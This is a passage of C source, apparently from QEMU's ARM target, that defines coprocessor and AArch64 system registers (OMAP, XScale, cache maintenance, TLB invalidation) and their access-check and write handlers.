vmsa_ttbcr_raw_write, .bank_fieldoffsets = { offsetoflow32(CPUARMState, cp15.tcr_el[3]), offsetoflow32(CPUARMState, cp15.tcr_el[1])} }, REGINFO_SENTINEL }; /* Note that unlike TTBCR, writing to TTBCR2 does not require flushing * qemu tlbs nor adjusting cached masks. */ static const ARMCPRegInfo ttbcr2_reginfo = { .name = "TTBCR2", .cp = 15, .opc1 = 0, .crn = 2, .crm = 0, .opc2 = 3, .access = PL1_RW, .accessfn = access_tvm_trvm, .type = ARM_CP_ALIAS, .bank_fieldoffsets = { offsetofhigh32(CPUARMState, cp15.tcr_el[3]), offsetofhigh32(CPUARMState, cp15.tcr_el[1]) }, }; static void omap_ticonfig_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { env->cp15.c15_ticonfig = value & 0xe7; /* The OS_TYPE bit in this register changes the reported CPUID! */ env->cp15.c0_cpuid = (value & (1 << 5)) ? 
ARM_CPUID_TI915T : ARM_CPUID_TI925T; } static void omap_threadid_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { env->cp15.c15_threadid = value & 0xffff; } static void omap_wfi_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { /* Wait-for-interrupt (deprecated) */ cpu_interrupt(env_cpu(env), CPU_INTERRUPT_HALT); } static void omap_cachemaint_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { /* On OMAP there are registers indicating the max/min index of dcache lines * containing a dirty line; cache flush operations have to reset these. */ env->cp15.c15_i_max = 0x000; env->cp15.c15_i_min = 0xff0; } static const ARMCPRegInfo omap_cp_reginfo[] = { { .name = "DFSR", .cp = 15, .crn = 5, .crm = CP_ANY, .opc1 = CP_ANY, .opc2 = CP_ANY, .access = PL1_RW, .type = ARM_CP_OVERRIDE, .fieldoffset = offsetoflow32(CPUARMState, cp15.esr_el[1]), .resetvalue = 0, }, { .name = "", .cp = 15, .crn = 15, .crm = 0, .opc1 = 0, .opc2 = 0, .access = PL1_RW, .type = ARM_CP_NOP }, { .name = "TICONFIG", .cp = 15, .crn = 15, .crm = 1, .opc1 = 0, .opc2 = 0, .access = PL1_RW, .fieldoffset = offsetof(CPUARMState, cp15.c15_ticonfig), .resetvalue = 0, .writefn = omap_ticonfig_write }, { .name = "IMAX", .cp = 15, .crn = 15, .crm = 2, .opc1 = 0, .opc2 = 0, .access = PL1_RW, .fieldoffset = offsetof(CPUARMState, cp15.c15_i_max), .resetvalue = 0, }, { .name = "IMIN", .cp = 15, .crn = 15, .crm = 3, .opc1 = 0, .opc2 = 0, .access = PL1_RW, .resetvalue = 0xff0, .fieldoffset = offsetof(CPUARMState, cp15.c15_i_min) }, { .name = "THREADID", .cp = 15, .crn = 15, .crm = 4, .opc1 = 0, .opc2 = 0, .access = PL1_RW, .fieldoffset = offsetof(CPUARMState, cp15.c15_threadid), .resetvalue = 0, .writefn = omap_threadid_write }, { .name = "TI925T_STATUS", .cp = 15, .crn = 15, .crm = 8, .opc1 = 0, .opc2 = 0, .access = PL1_RW, .type = ARM_CP_NO_RAW, .readfn = arm_cp_read_zero, .writefn = omap_wfi_write, }, /* TODO: Peripheral port remap register: * On OMAP2 mcr p15, 0, rn, c15, c2, 4 sets up the interrupt controller * base address at $rn & ~0xfff and map size of 0x200 << ($rn & 0xfff), * when MMU is off. */ { .name = "OMAP_CACHEMAINT", .cp = 15, .crn = 7, .crm = CP_ANY, .opc1 = 0, .opc2 = CP_ANY, .access = PL1_W, .type = ARM_CP_OVERRIDE | ARM_CP_NO_RAW, .writefn = omap_cachemaint_write }, { .name = "C9", .cp = 15, .crn = 9, .crm = CP_ANY, .opc1 = CP_ANY, .opc2 = CP_ANY, .access = PL1_RW, .type = ARM_CP_CONST | ARM_CP_OVERRIDE, .resetvalue = 0 }, REGINFO_SENTINEL }; static void xscale_cpar_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { env->cp15.c15_cpar = value & 0x3fff; } static const ARMCPRegInfo xscale_cp_reginfo[] = { { .name = "XSCALE_CPAR", .cp = 15, .crn = 15, .crm = 1, .opc1 = 0, .opc2 = 0, .access = PL1_RW, .fieldoffset = offsetof(CPUARMState, cp15.c15_cpar), .resetvalue = 0, .writefn = xscale_cpar_write, }, { .name = "XSCALE_AUXCR", .cp = 15, .crn = 1, .crm = 0, .opc1 = 0, .opc2 = 1, .access = PL1_RW, .fieldoffset = offsetof(CPUARMState, cp15.c1_xscaleauxcr), .resetvalue = 0, }, /* XScale specific cache-lockdown: since we have no cache we NOP these * and hope the guest does not really rely on cache behaviour. 
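* (All four lockdown/unlock operations below are therefore registered as ARM_CP_NOP.)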
*/ { .name = "XSCALE_LOCK_ICACHE_LINE", .cp = 15, .opc1 = 0, .crn = 9, .crm = 1, .opc2 = 0, .access = PL1_W, .type = ARM_CP_NOP }, { .name = "XSCALE_UNLOCK_ICACHE", .cp = 15, .opc1 = 0, .crn = 9, .crm = 1, .opc2 = 1, .access = PL1_W, .type = ARM_CP_NOP }, { .name = "XSCALE_DCACHE_LOCK", .cp = 15, .opc1 = 0, .crn = 9, .crm = 2, .opc2 = 0, .access = PL1_RW, .type = ARM_CP_NOP }, { .name = "XSCALE_UNLOCK_DCACHE", .cp = 15, .opc1 = 0, .crn = 9, .crm = 2, .opc2 = 1, .access = PL1_W, .type = ARM_CP_NOP }, REGINFO_SENTINEL }; static const ARMCPRegInfo dummy_c15_cp_reginfo[] = { /* RAZ/WI the whole crn=15 space, when we don't have a more specific * implementation of this implementation-defined space. * Ideally this should eventually disappear in favour of actually * implementing the correct behaviour for all cores. */ { .name = "C15_IMPDEF", .cp = 15, .crn = 15, .crm = CP_ANY, .opc1 = CP_ANY, .opc2 = CP_ANY, .access = PL1_RW, .type = ARM_CP_CONST | ARM_CP_NO_RAW | ARM_CP_OVERRIDE, .resetvalue = 0 }, REGINFO_SENTINEL }; static const ARMCPRegInfo cache_dirty_status_cp_reginfo[] = { /* Cache status: RAZ because we have no cache so it's always clean */ { .name = "CDSR", .cp = 15, .crn = 7, .crm = 10, .opc1 = 0, .opc2 = 6, .access = PL1_R, .type = ARM_CP_CONST | ARM_CP_NO_RAW, .resetvalue = 0 }, REGINFO_SENTINEL }; static const ARMCPRegInfo cache_block_ops_cp_reginfo[] = { /* We never have a a block transfer operation in progress */ { .name = "BXSR", .cp = 15, .crn = 7, .crm = 12, .opc1 = 0, .opc2 = 4, .access = PL0_R, .type = ARM_CP_CONST | ARM_CP_NO_RAW, .resetvalue = 0 }, /* The cache ops themselves: these all NOP for QEMU */ { .name = "IICR", .cp = 15, .crm = 5, .opc1 = 0, .access = PL1_W, .type = ARM_CP_NOP|ARM_CP_64BIT }, { .name = "IDCR", .cp = 15, .crm = 6, .opc1 = 0, .access = PL1_W, .type = ARM_CP_NOP|ARM_CP_64BIT }, { .name = "CDCR", .cp = 15, .crm = 12, .opc1 = 0, .access = PL0_W, .type = ARM_CP_NOP|ARM_CP_64BIT }, { .name = "PIR", .cp = 15, .crm = 12, .opc1 = 1, .access = PL0_W, .type = ARM_CP_NOP|ARM_CP_64BIT }, { .name = "PDR", .cp = 15, .crm = 12, .opc1 = 2, .access = PL0_W, .type = ARM_CP_NOP|ARM_CP_64BIT }, { .name = "CIDCR", .cp = 15, .crm = 14, .opc1 = 0, .access = PL1_W, .type = ARM_CP_NOP|ARM_CP_64BIT }, REGINFO_SENTINEL }; static const ARMCPRegInfo cache_test_clean_cp_reginfo[] = { /* The cache test-and-clean instructions always return (1 << 30) * to indicate that there are no dirty cache lines. 
*/ { .name = "TC_DCACHE", .cp = 15, .crn = 7, .crm = 10, .opc1 = 0, .opc2 = 3, .access = PL0_R, .type = ARM_CP_CONST | ARM_CP_NO_RAW, .resetvalue = (1 << 30) }, { .name = "TCI_DCACHE", .cp = 15, .crn = 7, .crm = 14, .opc1 = 0, .opc2 = 3, .access = PL0_R, .type = ARM_CP_CONST | ARM_CP_NO_RAW, .resetvalue = (1 << 30) }, REGINFO_SENTINEL }; static const ARMCPRegInfo strongarm_cp_reginfo[] = { /* Ignore ReadBuffer accesses */ { .name = "C9_READBUFFER", .cp = 15, .crn = 9, .crm = CP_ANY, .opc1 = CP_ANY, .opc2 = CP_ANY, .access = PL1_RW, .resetvalue = 0, .type = ARM_CP_CONST | ARM_CP_OVERRIDE | ARM_CP_NO_RAW }, REGINFO_SENTINEL }; static uint64_t midr_read(CPUARMState *env, const ARMCPRegInfo *ri) { ARMCPU *cpu = env_archcpu(env); unsigned int cur_el = arm_current_el(env); bool secure = arm_is_secure(env); if (arm_feature(&cpu->env, ARM_FEATURE_EL2) && !secure && cur_el == 1) { return env->cp15.vpidr_el2; } return raw_read(env, ri); } static uint64_t mpidr_read_val(CPUARMState *env) { ARMCPU *cpu = env_archcpu(env); uint64_t mpidr = cpu->mp_affinity; if (arm_feature(env, ARM_FEATURE_V7MP)) { mpidr |= (1U << 31); /* Cores which are uniprocessor (non-coherent) * but still implement the MP extensions set * bit 30. (For instance, Cortex-R5). */ if (cpu->mp_is_up) { mpidr |= (1u << 30); } } return mpidr; } static uint64_t mpidr_read(CPUARMState *env, const ARMCPRegInfo *ri) { unsigned int cur_el = arm_current_el(env); bool secure = arm_is_secure(env); if (arm_feature(env, ARM_FEATURE_EL2) && !secure && cur_el == 1) { return env->cp15.vmpidr_el2; } return mpidr_read_val(env); } static const ARMCPRegInfo lpae_cp_reginfo[] = { /* NOP AMAIR0/1 */ { .name = "AMAIR0", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .crn = 10, .crm = 3, .opc1 = 0, .opc2 = 0, .access = PL1_RW, .accessfn = access_tvm_trvm, .type = ARM_CP_CONST, .resetvalue = 0 }, /* AMAIR1 is mapped to AMAIR_EL1[63:32] */ { .name = "AMAIR1", .cp = 15, .crn = 10, .crm = 3, .opc1 = 0, .opc2 = 1, .access = PL1_RW, .accessfn = access_tvm_trvm, .type = ARM_CP_CONST, .resetvalue = 0 }, { .name = "PAR", .cp = 15, .crm = 7, .opc1 = 0, .access = PL1_RW, .type = ARM_CP_64BIT, .resetvalue = 0, .bank_fieldoffsets = { offsetof(CPUARMState, cp15.par_s), offsetof(CPUARMState, cp15.par_ns)} }, { .name = "TTBR0", .cp = 15, .crm = 2, .opc1 = 0, .access = PL1_RW, .accessfn = access_tvm_trvm, .type = ARM_CP_64BIT | ARM_CP_ALIAS, .bank_fieldoffsets = { offsetof(CPUARMState, cp15.ttbr0_s), offsetof(CPUARMState, cp15.ttbr0_ns) }, .writefn = vmsa_ttbr_write, }, { .name = "TTBR1", .cp = 15, .crm = 2, .opc1 = 1, .access = PL1_RW, .accessfn = access_tvm_trvm, .type = ARM_CP_64BIT | ARM_CP_ALIAS, .bank_fieldoffsets = { offsetof(CPUARMState, cp15.ttbr1_s), offsetof(CPUARMState, cp15.ttbr1_ns) }, .writefn = vmsa_ttbr_write, }, REGINFO_SENTINEL }; static uint64_t aa64_fpcr_read(CPUARMState *env, const ARMCPRegInfo *ri) { return vfp_get_fpcr(env); } static void aa64_fpcr_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { vfp_set_fpcr(env, value); } static uint64_t aa64_fpsr_read(CPUARMState *env, const ARMCPRegInfo *ri) { return vfp_get_fpsr(env); } static void aa64_fpsr_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { vfp_set_fpsr(env, value); } static CPAccessResult aa64_daif_access(CPUARMState *env, const ARMCPRegInfo *ri, bool isread) { if (arm_current_el(env) == 0 && !(arm_sctlr(env, 0) & SCTLR_UMA)) { return CP_ACCESS_TRAP; } return CP_ACCESS_OK; } static void aa64_daif_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { env->daif 
= value & PSTATE_DAIF; } static uint64_t aa64_pan_read(CPUARMState *env, const ARMCPRegInfo *ri) { return env->pstate & PSTATE_PAN; } static void aa64_pan_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { env->pstate = (env->pstate & ~PSTATE_PAN) | (value & PSTATE_PAN); } static const ARMCPRegInfo pan_reginfo = { .name = "PAN", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 4, .crm = 2, .opc2 = 3, .type = ARM_CP_NO_RAW, .access = PL1_RW, .readfn = aa64_pan_read, .writefn = aa64_pan_write }; static uint64_t aa64_uao_read(CPUARMState *env, const ARMCPRegInfo *ri) { return env->pstate & PSTATE_UAO; } static void aa64_uao_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { env->pstate = (env->pstate & ~PSTATE_UAO) | (value & PSTATE_UAO); } static const ARMCPRegInfo uao_reginfo = { .name = "UAO", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 4, .crm = 2, .opc2 = 4, .type = ARM_CP_NO_RAW, .access = PL1_RW, .readfn = aa64_uao_read, .writefn = aa64_uao_write }; static CPAccessResult aa64_cacheop_poc_access(CPUARMState *env, const ARMCPRegInfo *ri, bool isread) { /* Cache invalidate/clean to Point of Coherency or Persistence... */ switch (arm_current_el(env)) { case 0: /* ... EL0 must UNDEF unless SCTLR_EL1.UCI is set. */ if (!(arm_sctlr(env, 0) & SCTLR_UCI)) { return CP_ACCESS_TRAP; } /* fall through */ case 1: /* ... EL1 must trap to EL2 if HCR_EL2.TPCP is set. */ if (arm_hcr_el2_eff(env) & HCR_TPCP) { return CP_ACCESS_TRAP_EL2; } break; } return CP_ACCESS_OK; } static CPAccessResult aa64_cacheop_pou_access(CPUARMState *env, const ARMCPRegInfo *ri, bool isread) { /* Cache invalidate/clean to Point of Unification... */ switch (arm_current_el(env)) { case 0: /* ... EL0 must UNDEF unless SCTLR_EL1.UCI is set. */ if (!(arm_sctlr(env, 0) & SCTLR_UCI)) { return CP_ACCESS_TRAP; } /* fall through */ case 1: /* ... EL1 must trap to EL2 if HCR_EL2.TPU is set. */ if (arm_hcr_el2_eff(env) & HCR_TPU) { return CP_ACCESS_TRAP_EL2; } break; } return CP_ACCESS_OK; } /* See: D4.7.2 TLB maintenance requirements and the TLB maintenance instructions * Page D4-1736 (DDI0487A.b) */ static int vae1_tlbmask(CPUARMState *env) { /* Since we exclude secure first, we may read HCR_EL2 directly. */ if (arm_is_secure_below_el3(env)) { return ARMMMUIdxBit_SE10_1 | ARMMMUIdxBit_SE10_1_PAN | ARMMMUIdxBit_SE10_0; } else if ((env->cp15.hcr_el2 & (HCR_E2H | HCR_TGE)) == (HCR_E2H | HCR_TGE)) { return ARMMMUIdxBit_E20_2 | ARMMMUIdxBit_E20_2_PAN | ARMMMUIdxBit_E20_0; } else { return ARMMMUIdxBit_E10_1 | ARMMMUIdxBit_E10_1_PAN | ARMMMUIdxBit_E10_0; } } static void tlbi_aa64_vmalle1is_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { CPUState *cs = env_cpu(env); int mask = vae1_tlbmask(env); tlb_flush_by_mmuidx_all_cpus_synced(cs, mask); } static void tlbi_aa64_vmalle1_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { CPUState *cs = env_cpu(env); int mask = vae1_tlbmask(env); if (tlb_force_broadcast(env)) { tlb_flush_by_mmuidx_all_cpus_synced(cs, mask); } else { tlb_flush_by_mmuidx(cs, mask); } } static int alle1_tlbmask(CPUARMState *env) { /* * Note that the 'ALL' scope must invalidate both stage 1 and * stage 2 translations, whereas most other scopes only invalidate * stage 1 translations. 
*/ if (arm_is_secure_below_el3(env)) { return ARMMMUIdxBit_SE10_1 | ARMMMUIdxBit_SE10_1_PAN | ARMMMUIdxBit_SE10_0; } else if (arm_feature(env, ARM_FEATURE_EL2)) { return ARMMMUIdxBit_E10_1 | ARMMMUIdxBit_E10_1_PAN | ARMMMUIdxBit_E10_0 | ARMMMUIdxBit_Stage2; } else { return ARMMMUIdxBit_E10_1 | ARMMMUIdxBit_E10_1_PAN | ARMMMUIdxBit_E10_0; } } static int e2_tlbmask(CPUARMState *env) { /* TODO: ARMv8.4-SecEL2 */ return ARMMMUIdxBit_E20_0 | ARMMMUIdxBit_E20_2 | ARMMMUIdxBit_E20_2_PAN | ARMMMUIdxBit_E2; } static void tlbi_aa64_alle1_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { CPUState *cs = env_cpu(env); int mask = alle1_tlbmask(env); tlb_flush_by_mmuidx(cs, mask); } static void tlbi_aa64_alle2_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { CPUState *cs = env_cpu(env); int mask = e2_tlbmask(env); tlb_flush_by_mmuidx(cs, mask); } static void tlbi_aa64_alle3_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { ARMCPU *cpu = env_archcpu(env); CPUState *cs = CPU(cpu); tlb_flush_by_mmuidx(cs, ARMMMUIdxBit_SE3); } static void tlbi_aa64_alle1is_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { CPUState *cs = env_cpu(env); int mask = alle1_tlbmask(env); tlb_flush_by_mmuidx_all_cpus_synced(cs, mask); } static void tlbi_aa64_alle2is_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { CPUState *cs = env_cpu(env); int mask = e2_tlbmask(env); tlb_flush_by_mmuidx_all_cpus_synced(cs, mask); } static void tlbi_aa64_alle3is_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { CPUState *cs = env_cpu(env); tlb_flush_by_mmuidx_all_cpus_synced(cs, ARMMMUIdxBit_SE3); } static void tlbi_aa64_vae2_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { /* Invalidate by VA, EL2 * Currently handles both VAE2 and VALE2, since we don't support * flush-last-level-only. */ CPUState *cs = env_cpu(env); int mask = e2_tlbmask(env); uint64_t pageaddr = sextract64(value << 12, 0, 56); tlb_flush_page_by_mmuidx(cs, pageaddr, mask); } static void tlbi_aa64_vae3_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { /* Invalidate by VA, EL3 * Currently handles both VAE3 and VALE3, since we don't support * flush-last-level-only. */ ARMCPU *cpu = env_archcpu(env); CPUState *cs = CPU(cpu); uint64_t pageaddr = sextract64(value << 12, 0, 56); tlb_flush_page_by_mmuidx(cs, pageaddr, ARMMMUIdxBit_SE3); } static void tlbi_aa64_vae1is_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { CPUState *cs = env_cpu(env); int mask = vae1_tlbmask(env); uint64_t pageaddr = sextract64(value << 12, 0, 56); tlb_flush_page_by_mmuidx_all_cpus_synced(cs, pageaddr, mask); } static void tlbi_aa64_vae1_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { /* Invalidate by VA, EL1&0 (AArch64 version). * Currently handles all of VAE1, VAAE1, VAALE1 and VALE1, * since we don't support flush-for-specific-ASID-only or * flush-last-level-only. 
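* The ASID in bits [63:48] of the written value is ignored: only bits [43:0] form the page address, and the flush applies to every ASID.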
*/ CPUState *cs = env_cpu(env); int mask = vae1_tlbmask(env); uint64_t pageaddr = sextract64(value << 12, 0, 56); if (tlb_force_broadcast(env)) { tlb_flush_page_by_mmuidx_all_cpus_synced(cs, pageaddr, mask); } else { tlb_flush_page_by_mmuidx(cs, pageaddr, mask); } } static void tlbi_aa64_vae2is_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { CPUState *cs = env_cpu(env); uint64_t pageaddr = sextract64(value << 12, 0, 56); tlb_flush_page_by_mmuidx_all_cpus_synced(cs, pageaddr, ARMMMUIdxBit_E2); } static void tlbi_aa64_vae3is_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { CPUState *cs = env_cpu(env); uint64_t pageaddr = sextract64(value << 12, 0, 56); tlb_flush_page_by_mmuidx_all_cpus_synced(cs, pageaddr, ARMMMUIdxBit_SE3); } static void tlbi_aa64_ipas2e1_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { /* Invalidate by IPA. This has to invalidate any structures that * contain only stage 2 translation information, but does not need * to apply to structures that contain combined stage 1 and stage 2 * translation information. * This must NOP if EL2 isn't implemented or SCR_EL3.NS is zero. */ ARMCPU *cpu = env_archcpu(env); CPUState *cs = CPU(cpu); uint64_t pageaddr; if (!arm_feature(env, ARM_FEATURE_EL2) || !(env->cp15.scr_el3 & SCR_NS)) { return; } pageaddr = sextract64(value << 12, 0, 48); tlb_flush_page_by_mmuidx(cs, pageaddr, ARMMMUIdxBit_Stage2); } static void tlbi_aa64_ipas2e1is_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { CPUState *cs = env_cpu(env); uint64_t pageaddr; if (!arm_feature(env, ARM_FEATURE_EL2) || !(env->cp15.scr_el3 & SCR_NS)) { return; } pageaddr = sextract64(value << 12, 0, 48); tlb_flush_page_by_mmuidx_all_cpus_synced(cs, pageaddr, ARMMMUIdxBit_Stage2); } static CPAccessResult aa64_zva_access(CPUARMState *env, const ARMCPRegInfo *ri, bool isread) { int cur_el = arm_current_el(env); if (cur_el < 2) { uint64_t hcr = arm_hcr_el2_eff(env); if (cur_el == 0) { if ((hcr & (HCR_E2H | HCR_TGE)) == (HCR_E2H | HCR_TGE)) { if (!(env->cp15.sctlr_el[2] & SCTLR_DZE)) { return CP_ACCESS_TRAP_EL2; } } else { if (!(env->cp15.sctlr_el[1] & SCTLR_DZE)) { return CP_ACCESS_TRAP; } if (hcr & HCR_TDZ) { return CP_ACCESS_TRAP_EL2; } } } else if (hcr & HCR_TDZ) { return CP_ACCESS_TRAP_EL2; } } return CP_ACCESS_OK; } static uint64_t aa64_dczid_read(CPUARMState *env, const ARMCPRegInfo *ri) { ARMCPU *cpu = env_archcpu(env); int dzp_bit = 1 << 4; /* DZP indicates whether DC ZVA access is allowed */ if (aa64_zva_access(env, NULL, false) == CP_ACCESS_OK) { dzp_bit = 0; } return cpu->dcz_blocksize | dzp_bit; } static CPAccessResult sp_el0_access(CPUARMState *env, const ARMCPRegInfo *ri, bool isread) { if (!(env->pstate & PSTATE_SP)) { /* Access to SP_EL0 is undefined if it's being used as * the stack pointer. */ return CP_ACCESS_TRAP_UNCATEGORIZED; } return CP_ACCESS_OK; } static uint64_t spsel_read(CPUARMState *env, const ARMCPRegInfo *ri) { return env->pstate & PSTATE_SP; } static void spsel_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t val) { update_spsel(env, val); } static void sctlr_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { ARMCPU *cpu = env_archcpu(env); if (raw_read(env, ri) == value) { /* Skip the TLB flush if nothing actually changed; Linux likes * to do a lot of pointless SCTLR writes. */ return; } if (arm_feature(env, ARM_FEATURE_PMSA) && !cpu->has_mpu) { /* M bit is RAZ/WI for PMSA with no MPU implemented */ value &= ~SCTLR_M; } raw_write(env, ri, value); /* ??? 
Lots of these bits are not implemented. */ /* This may enable/disable the MMU, so do a TLB flush. */ tlb_flush(CPU(cpu)); if (ri->type & ARM_CP_SUPPRESS_TB_END) { /* * Normally we would always end the TB on an SCTLR write; see the * comment in ARMCPRegInfo sctlr initialization below for why Xscale * is special. Setting ARM_CP_SUPPRESS_TB_END also stops the rebuild * of hflags from the translator, so do it here. */ arm_rebuild_hflags(env); } } static CPAccessResult fpexc32_access(CPUARMState *env, const ARMCPRegInfo *ri, bool isread) { if ((env->cp15.cptr_el[2] & CPTR_TFP) && arm_current_el(env) == 2) { return CP_ACCESS_TRAP_FP_EL2; } if (env->cp15.cptr_el[3] & CPTR_TFP) { return CP_ACCESS_TRAP_FP_EL3; } return CP_ACCESS_OK; } static void sdcr_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { env->cp15.mdcr_el3 = value & SDCR_VALID_MASK; } static const ARMCPRegInfo v8_cp_reginfo[] = { /* Minimal set of EL0-visible registers. This will need to be expanded * significantly for system emulation of AArch64 CPUs. */ { .name = "NZCV", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 3, .opc2 = 0, .crn = 4, .crm = 2, .access = PL0_RW, .type = ARM_CP_NZCV }, { .name = "DAIF", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 3, .opc2 = 1, .crn = 4, .crm = 2, .type = ARM_CP_NO_RAW, .access = PL0_RW, .accessfn = aa64_daif_access, .fieldoffset = offsetof(CPUARMState, daif), .writefn = aa64_daif_write, .resetfn = arm_cp_reset_ignore }, { .name = "FPCR", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 3, .opc2 = 0, .crn = 4, .crm = 4, .access = PL0_RW, .type = ARM_CP_FPU | ARM_CP_SUPPRESS_TB_END, .readfn = aa64_fpcr_read, .writefn = aa64_fpcr_write }, { .name = "FPSR", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 3, .opc2 = 1, .crn = 4, .crm = 4, .access = PL0_RW, .type = ARM_CP_FPU | ARM_CP_SUPPRESS_TB_END, .readfn = aa64_fpsr_read, .writefn = aa64_fpsr_write }, { .name = "DCZID_EL0", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 3, .opc2 = 7, .crn = 0, .crm = 0, .access = PL0_R, .type = ARM_CP_NO_RAW, .readfn = aa64_dczid_read }, { .name = "DC_ZVA", .state = ARM_CP_STATE_AA64, .opc0 = 1, .opc1 = 3, .crn = 7, .crm = 4, .opc2 = 1, .access = PL0_W, .type = ARM_CP_DC_ZVA, /* Avoid overhead of an access check that always passes in user-mode */ .accessfn = aa64_zva_access, }, { .name = "CURRENTEL", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .opc2 = 2, .crn = 4, .crm = 2, .access = PL1_R, .type = ARM_CP_CURRENTEL }, /* Cache ops: all NOPs since we don't emulate caches */ { .name = "IC_IALLUIS", .state = ARM_CP_STATE_AA64, .opc0 = 1, .opc1 = 0, .crn = 7, .crm = 1, .opc2 = 0, .access = PL1_W, .type = ARM_CP_NOP, .accessfn = aa64_cacheop_pou_access }, { .name = "IC_IALLU", .state = ARM_CP_STATE_AA64, .opc0 = 1, .opc1 = 0, .crn = 7, .crm = 5, .opc2 = 0, .access = PL1_W, .type = ARM_CP_NOP, .accessfn = aa64_cacheop_pou_access }, { .name = "IC_IVAU", .state = ARM_CP_STATE_AA64, .opc0 = 1, .opc1 = 3, .crn = 7, .crm = 5, .opc2 = 1, .access = PL0_W, .type = ARM_CP_NOP, .accessfn = aa64_cacheop_pou_access }, { .name = "DC_IVAC", .state = ARM_CP_STATE_AA64, .opc0 = 1, .opc1 = 0, .crn = 7, .crm = 6, .opc2 = 1, .access = PL1_W, .accessfn = aa64_cacheop_poc_access, .type = ARM_CP_NOP }, { .name = "DC_ISW", .state = ARM_CP_STATE_AA64, .opc0 = 1, .opc1 = 0, .crn = 7, .crm = 6, .opc2 = 2, .access = PL1_W, .accessfn = access_tsw, .type = ARM_CP_NOP }, { .name = "DC_CVAC", .state = ARM_CP_STATE_AA64, .opc0 = 1, .opc1 = 3, .crn = 7, .crm = 10, .opc2 = 1, .access = PL0_W, .type = ARM_CP_NOP, .accessfn = 
aa64_cacheop_poc_access }, { .name = "DC_CSW", .state = ARM_CP_STATE_AA64, .opc0 = 1, .opc1 = 0, .crn = 7, .crm = 10, .opc2 = 2, .access = PL1_W, .accessfn = access_tsw, .type = ARM_CP_NOP }, { .name = "DC_CVAU", .state = ARM_CP_STATE_AA64, .opc0 = 1, .opc1 = 3, .crn = 7, .crm = 11, .opc2 = 1, .access = PL0_W, .type = ARM_CP_NOP, .accessfn = aa64_cacheop_pou_access }, { .name = "DC_CIVAC", .state = ARM_CP_STATE_AA64, .opc0 = 1, .opc1 = 3, .crn = 7, .crm = 14, .opc2 = 1, .access = PL0_W, .type = ARM_CP_NOP, .accessfn = aa64_cacheop_poc_access }, { .name = "DC_CISW", .state = ARM_CP_STATE_AA64, .opc0 = 1, .opc1 = 0, .crn = 7, .crm = 14, .opc2 = 2, .access = PL1_W, .accessfn = access_tsw, .type = ARM_CP_NOP }, /* TLBI operations */ { .name = "TLBI_VMALLE1IS", .state = ARM_CP_STATE_AA64, .opc0 = 1, .opc1 = 0, .crn = 8, .crm = 3, .opc2 = 0, .access = PL1_W, .accessfn = access_ttlb, .type = ARM_CP_NO_RAW, .writefn = tlbi_aa64_vmalle1is_write }, { .name = "TLBI_VAE1IS", .state = ARM_CP_STATE_AA64, .opc0 = 1, .opc1 = 0, .crn = 8, .crm = 3, .opc2 = 1, .access = PL1_W, .accessfn = access_ttlb, .type = ARM_CP_NO_RAW, .writefn = tlbi_aa64_vae1is_write }, { .name = "TLBI_ASIDE1IS", .state = ARM_CP_STATE_AA64, .opc0 = 1, .opc1 = 0, .crn = 8, .crm = 3, .opc2 = 2, .access = PL1_W, .accessfn = access_ttlb, .type = ARM_CP_NO_RAW, .writefn = tlbi_aa64_vmalle1is_write }, { .name = "TLBI_VAAE1IS", .state = ARM_CP_STATE_AA64, .opc0 = 1, .opc1 = 0, .crn = 8, .crm = 3, .opc2 = 3, .access = PL1_W, .accessfn = access_ttlb, .type = ARM_CP_NO_RAW, .writefn = tlbi_aa64_vae1is_write }, { .name = "TLBI_VALE1IS", .state = ARM_CP_STATE_AA64, .opc0 = 1, .opc1 = 0, .crn = 8, .crm = 3, .opc2 = 5, .access = PL1_W, .accessfn = access_ttlb, .type = ARM_CP_NO_RAW, .writefn = tlbi_aa64_vae1is_write }, { .name = "TLBI_VAALE1IS", .state = ARM_CP_STATE_AA64, .opc0 = 1, .opc1 = 0, .crn = 8, .crm = 3, .opc2 = 7, .access = PL1_W, .accessfn = access_ttlb, .type = ARM_CP_NO_RAW, .writefn = tlbi_aa64_vae1is_write }, { .name = "TLBI_VMALLE1", .state = ARM_CP_STATE_AA64, .opc0 = 1, .opc1 = 0, .crn = 8, .crm = 7, .opc2 = 0, .access = PL1_W, .accessfn = access_ttlb, .type 